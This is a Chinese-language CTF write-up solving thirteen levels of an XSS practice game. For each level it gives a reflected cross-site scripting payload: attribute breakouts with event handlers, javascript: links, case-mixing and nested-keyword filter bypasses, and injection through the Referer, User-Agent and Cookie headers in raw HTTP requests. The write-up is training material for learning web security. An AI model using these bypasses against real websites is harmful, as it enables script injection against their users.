【CTF】某xss练手小游戏

http://test.xss.tv

1、http://47.94.13.75/test/level1.php?name=test

　　直接插入即可，如：

　　http://47.94.13.75/test/level1.php?name=<script>alert(1)</script>

2、http://47.94.13.75/test/level2.php?keyword=test

　　文本框中输入，闭合一下即可，如：

　　http://47.94.13.75/test/level2.php?keyword="><script>alert(1)</script>

3、http://47.94.13.75/test/level3.php?writing=wait

　　尖括号被编码，直接使用事件即可，如：

　　http://47.94.13.75/test/level3.php?keyword=' onmouseover=alert(1) '&submit=搜索

4、http://47.94.13.75/test/level4.php?keyword=try harder!

　　与第三关类似，使用事件来闭合，弹窗，如：

　　http://47.94.13.75/test/level4.php?keyword=" onmouseover=alert(1) "&submit=搜索

5、http://47.94.13.75/test/level5.php?keyword=find a way out!

　　事件被插入特殊符号，改用其它标签，如：

　　http://47.94.13.75/test/level5.php?keyword="><a href=javascript:alert(1)>click</a>&submit=搜索

　　点击click链接即可弹窗

6、http://47.94.13.75/test/level6.php?keyword=break it out!

　　与第五关类似，这里可以直接用大写绕过，如：

　　http://47.94.13.75/test/level6.php?keyword=" Onmouseover=alert(1) "&submit=搜索

7、http://47.94.13.75/test/level7.php?keyword=move up!

　　on直接被过滤，用嵌套绕过，如：

　　http://47.94.13.75/test/level7.php?keyword=" oonnmouseover=alert(1) "&submit=搜索

8、http://47.94.13.75/test/level8.php?keyword=nice try!

　　链接型，js协议加编码绕过绕过，如：

　　http://47.94.13.75/test/level8.php?keyword=javascript:alert(1)&submit=添加友情链接

9、http://47.94.13.75/test/level9.php?keyword=not bad!

　　构造合法链接，结合js协议与编码绕过，如：

　　http://47.94.13.75/test/level9.php?keyword=javascript:alert("http://")&submit=添加友情链接

10、http://47.94.13.75/test/level10.php?keyword=well done!

　　根据源码构造url参数，如：

　　http://47.94.13.75/test/level10.php?keyword=well done!&t_sort=xss" onmouseover=alert(1) type="button" "

　　http://47.94.13.75/test/level10.php?keyword=well done!&t_sort=xss" accesskey="X" onclick=“alert(1)  ///通过shift+alt+X快捷键触发（火狐可以）　

11、http://47.94.13.75/test/level11.php?keyword=good job!

　　抓取post数据包，构造referer值，如：

GET /test/level11.php?keyword=good%20job! HTTP/1.1
Host: 47.94.13.75
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Referer:" onmouseover=alert(1) type="button" "

12、http://47.94.13.75/test/level12.php?keyword=good job!

　　构造user-agent值即可，如：

GET /test/level12.php?keyword=good%20job! HTTP/1.1
Host: 47.94.13.75
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0" onmouseover=alert(1) type="button" "
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

13、http://47.94.13.75/test/level13.php?keyword=good job!

　　构造cookie，如：

GET /test/level13.php?keyword=good%20job! HTTP/1.1
Host: 47.94.13.75
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: user=call+me+maybe%3F" onmouseover=alert(1) type="button" "
Connection: keep-alive
Upgrade-Insecure-Requests: 1